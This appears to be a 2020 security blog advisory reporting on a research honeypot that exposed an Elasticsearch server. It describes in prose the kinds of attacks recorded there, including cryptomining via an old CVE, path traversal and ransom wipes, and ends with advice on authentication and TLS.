Elasticsearch: Honeypot method gets the attention of Threat actors

June 23, 2020
elasticsearch honeypot threat actors threat advisory

Elasticsearch is an Open Source software project that was developed by Elastic. There were instances of leaked, lost, or stolen data because the data was not securely stored. The mentioned instances are one of the reasons why Threat actors are targeting this software. They can find unsecured Elasticsearch quicker than search engines.


Security team tests the honeypot

A private security research team has setup an Elasticsearch honeypot to see how fast an unsecured data becomes compromised. A honeypot is a system on the Internet that is created by security experts to attract and “trap” “hackers” who attempt to get into other people’s computer systems.

The research team left the Elasticsearch server exposed on May 11, 2020 – May 20, 2020. They have found that there was a total of 175 attacks made just 8 hours after deployment. Their honeypot averaged to 18 attacks per day.


Honeypot Statistics

The highest number of attacks came from these countries: U.S. (89), Romania (38), and China (15).

It is noticeable that most attacks made aim to get information about the status of the database and its settings. There was a total of 147 attacks that used the GET request method.

“Attackers weren’t just interested in stealing data. Some wanted to hijack servers to mine cryptocurrency, steal passwords, and destroy data. – Comparitech”

Most of the Threat actors were attempting to mine cryptocurrency by trying to exploit an old vulnerability (CVE-2015-1427) to install a miner. These attacks were from different IP but had the same script download source.


More attacks from the threat actors

Another attack that threat actors made is targeted passwords within the server’s /etc/passwd file. They have used a path traversal attack by using the GET and POST methods.

Other outrageous attacks comprise of attempting to change the Server configuration so they will able to delete all stored data and asks for a ransom after destroying the data. The Threat actor also tried turning off the server’s firewall debilitating iptables.

On May 29, 2020, a bot came across the honeypot. The malicious actors launched an attack that deleted the contents of the database and provided a message requesting a ransom together with a piece of contact information.


elasticsearch image 2


As there were billions of records from millions of users leaked on an unprotected Elasticsearch server, it is best to take extra caution and make sure that authentication is used, and secured credentials are being observed. It’s also best to enable Transport Layer Security (TLS) to ensure security when data is transiting the network.

About the author

Leave a Reply